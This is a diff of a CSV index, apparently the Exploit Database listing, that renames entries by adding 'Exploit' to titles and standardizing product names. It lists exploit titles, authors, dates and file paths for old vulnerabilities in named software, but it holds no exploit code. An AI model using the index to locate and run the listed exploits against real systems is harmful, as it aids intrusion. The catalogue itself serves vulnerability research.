-19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",multiple,dos,0
+19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit",1996-12-10,"Josh Richards",multiple,dos,0
 19537,platforms/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote,0
 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote,0
-19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME",1999-10-11,"Georgi Guninski",windows,remote,0
+19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit",1999-10-11,"Georgi Guninski",windows,remote,0
 19540,platforms/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote,0
 19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0
 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' symlink",1999-10-11,"Brock Tellier",sco,local,0
@@ -16922,9 +16925,9 @@ id,file,description,date,author,platform,type,port
 19548,platforms/php/webapps/19548.txt,"gpEasy CMS Minishop 1.5 Plugin - Persistent Cross-Site Scripting",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0
 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0
 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps,0
-19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
-19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",multiple,local,0
-19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",php,remote,0
+19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
+19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0
+19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit",1997-10-19,"Bryan Berg",php,remote,0
 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (1)",1998-03-16,Rootshell,hardware,remote,0
 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (2)",1998-03-17,Rootshell,hardware,remote,0
 19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0
@@ -16936,7 +16939,7 @@ id,file,description,date,author,platform,type,port
 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0
 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0
 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos,0
-19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools",1999-10-22,"Brock Tellier",linux,local,0
+19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0
 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0
 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0
 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0
@@ -17028,17 +17031,17 @@ id,file,description,date,author,platform,type,port
 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
-19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0
+19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0
 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0
 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0
 19657,platforms/sco/local/19657.txt,"SCO Unixware 7.1 - '/var/mail' Permissions",1999-12-03,"Brock Tellier",sco,local,0
-19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' commands",1999-12-03,"Brock Tellier",sco,local,0
+19658,platforms/sco/local/19658.txt,"SCO Unixware 7.1 - 'pkg' command Exploit",1999-12-03,"Brock Tellier",sco,local,0
 19659,platforms/sco/local/19659.sh,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'coredump' Symlink",1999-12-03,"Brock Tellier",sco,local,0
 19660,platforms/sco/local/19660.c,"SCO Unixware 7.1 pkgcat - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0
 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall - Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0
 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote,0
 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - (print_domain_name) Buffer Overflow",1999-12-07,K2,solaris,remote,0
-19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5a - Server SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos,0
+19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service",1999-12-02,"Ussr Labs",windows,dos,0
 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5 - vnd.ms.radio URL",1999-12-06,"Jeremy Kothe",windows,local,0
 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - Denial of Service",1999-12-06,"Ussr Labs",windows,dos,0
 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote,0
@@ -17073,15 +17076,15 @@ id,file,description,date,author,platform,type,port
 19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",linux,dos,0
 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0
 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos,0
-19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,multiple,local,0
+19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH Exploit",1999-12-30,Loneguard,multiple,local,0
 19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote,0
-19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - midikeys/soundplayer",1999-12-31,Loneguard,irix,local,0
+19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - midikeys/soundplayer Exploit",1999-12-31,Loneguard,irix,local,0
 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0
 19708,platforms/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote,0
 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (1)",2000-01-04,dildog,linux,local,0
 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path Exploit (2)",2000-03-15,"Elias Levy",linux,local,0
 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service",2000-01-05,"Ussr Labs",windows,dos,0
-19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0
+19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Exploit",2000-01-04,anonymous,multiple,remote,0
 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0
 40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,ruby,remote,80
 19715,platforms/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0
@@ -17112,7 +17115,7 @@ id,file,description,date,author,platform,type,port
 19740,platforms/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - (CWD/MKD) Denial of Service",2000-02-03,crc,windows,dos,0
 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0
 19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0
-19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut",2000-02-04,"Ussr Labs",windows,remote,0
+19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0
 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos,0
 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0
 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",novell,dos,0
@@ -17123,7 +17126,7 @@ id,file,description,date,author,platform,type,port
 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0
 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp symlink",2000-02-15,"Shawn Bracken",sco,local,0
 19753,platforms/windows/remote/19753.txt,"Microsoft FrontPage personal WebServer 1.0/personal Web server 4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote,0
-19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf",2000-02-18,"Eric Stevens",windows,local,0
+19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0
 19755,platforms/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",windows,dos,0
 19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0
 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0
@@ -17133,14 +17136,14 @@ id,file,description,date,author,platform,type,port
 19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 Beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0
 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0
 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0
-19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0
-19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - setxconf",2000-02-24,suid,linux,local,0
+19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig Exploit",2000-02-24,suid,linux,local,0
+19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - setxconf Exploit",2000-02-24,suid,linux,local,0
 19766,platforms/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",hardware,dos,0
 19768,platforms/php/webapps/19768.txt,"House Style 0.1.2 - readfile() Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0
 19769,platforms/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0
 19771,platforms/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 - Local File Disclosure",2012-07-12,GoLd_M,php,webapps,0
 19772,platforms/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",windows,dos,0
-19774,platforms/hardware/webapps/19774.txt,"TP Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0
+19774,platforms/hardware/webapps/19774.txt,"TP-Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,hardware,webapps,0
 19775,platforms/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,php,webapps,0
 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow",2012-07-12,b33f,windows,local,0
 19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
@@ -17154,7 +17157,7 @@ id,file,description,date,author,platform,type,port
 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0
 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",cgi,remote,0
 19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - Denial of Serviceemu Distribution Configuration",2000-03-02,suid,linux,local,0
-19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0
+19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname Exploit",2000-03-05,rpc,irix,remote,0
 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0
 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0
 19791,platforms/php/webapps/19791.txt,"WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",php,webapps,0
@@ -17162,7 +17165,7 @@ id,file,description,date,author,platform,type,port
 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0
 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0
 19795,platforms/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote,0
-19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",multiple,local,0
+19796,platforms/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)",2000-03-03,"Babcia Padlina",multiple,local,0
 19797,platforms/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote,0
 19798,platforms/windows/local/19798.txt,"Microsoft Windows NT 4.0 - User Shell Folders",2000-03-09,anonymous,windows,local,0
 19799,platforms/windows/dos/19799.txt,"Microsoft Windows 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0
@@ -17177,9 +17180,9 @@ id,file,description,date,author,platform,type,port
 19808,platforms/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",cgi,remote,0
 19809,platforms/windows/remote/19809.txt,"Oracle Web Listener 4.0.x - for NT Batch File",2000-03-15,"Cerberus Security Team",windows,remote,0
 19810,platforms/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",windows,dos,0
-19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (1)",2000-03-13,funkysh,linux,local,0
-19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0
-19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd",2000-03-16,Sebastian,linux,local,0
+19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (1)",2000-03-13,funkysh,linux,local,0
+19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel Exploit (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0
+19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit",2000-03-16,Sebastian,linux,local,0
 19814,platforms/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",multiple,remote,0
 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",windows,remote,0
 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0
@@ -17248,7 +17251,7 @@ id,file,description,date,author,platform,type,port
 19879,platforms/linux/remote/19879.txt,"RedHat 6.2 - Piranha Virtual Server Package Default Account and Password",2000-04-24,"Max Vision",linux,remote,0
 19880,platforms/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,windows,dos,0
 19881,platforms/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote,0
-19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %%",2000-04-26,"Keith Woodworth",hardware,remote,0
+19882,platforms/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %% Exploit",2000-04-26,"Keith Woodworth",hardware,remote,0
 19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0
 19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos,0
 19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos,0
@@ -17265,7 +17268,7 @@ id,file,description,date,author,platform,type,port
 19897,platforms/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0
 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 - Denial of Service",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
-19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console",2000-05-03,"Michal Zalewski",linux,local,0
+19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - pam_console Exploit",2000-05-03,"Michal Zalewski",linux,local,0
 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 - Exploit",2000-05-16,"Stephen Friedl",hardware,remote,0
 20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb Parameter) Cross-Site Scripting",2012-07-21,muts,php,webapps,0
 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote,0
@@ -17345,7 +17348,7 @@ id,file,description,date,author,platform,type,port
 19987,platforms/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,linux,dos,0
 19988,platforms/windows/dos/19988.pl,"httpdx 1.5.4 - Remote HTTP Server Denial of Service",2012-07-20,st3n,windows,dos,0
 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0
-19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp symlink",2000-06-02,"Jason Axley",hp-ux,local,0
+19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 man - /tmp Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0
 19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
 19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
@@ -17481,7 +17484,7 @@ id,file,description,date,author,platform,type,port
 20135,platforms/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",windows,remote,0
 20136,platforms/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",windows,remote,0
 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0
-20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail",1997-09-01,"Last Stage of Delirium",irix,local,0
+20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail Exploit",1997-09-01,"Last Stage of Delirium",irix,local,0
 20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote,0
 20140,platforms/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",multiple,remote,0
 20141,platforms/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0
@@ -17568,7 +17571,7 @@ id,file,description,date,author,platform,type,port
 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0
 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0
 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0
-20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0
+20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0
 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0
 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0
 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0
@@ -17649,7 +17652,7 @@ id,file,description,date,author,platform,type,port
 20309,platforms/windows/remote/20309.txt,"Microsoft IIS 3.0 - newdsn.exe File Creation",1997-08-25,"Vytis Fedaravicius",windows,remote,0
 20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0
 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
-20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0
+20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual Escribá",linux,local,0
 20313,platforms/multiple/remote/20313.txt,"Allaire JRun 3 - Directory Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0
 20314,platforms/multiple/remote/20314.txt,"Allaire JRun 2.3 - Arbitrary Code Execution",2000-10-23,"Foundstone Labs",multiple,remote,0
 20315,platforms/multiple/remote/20315.txt,"Allaire JRun 2.3 - File Source Code Disclosure",2000-10-23,"Foundstone Labs",multiple,remote,0
@@ -17671,7 +17674,7 @@ id,file,description,date,author,platform,type,port
 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0
 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0
 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0
-20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
+20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0
 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0
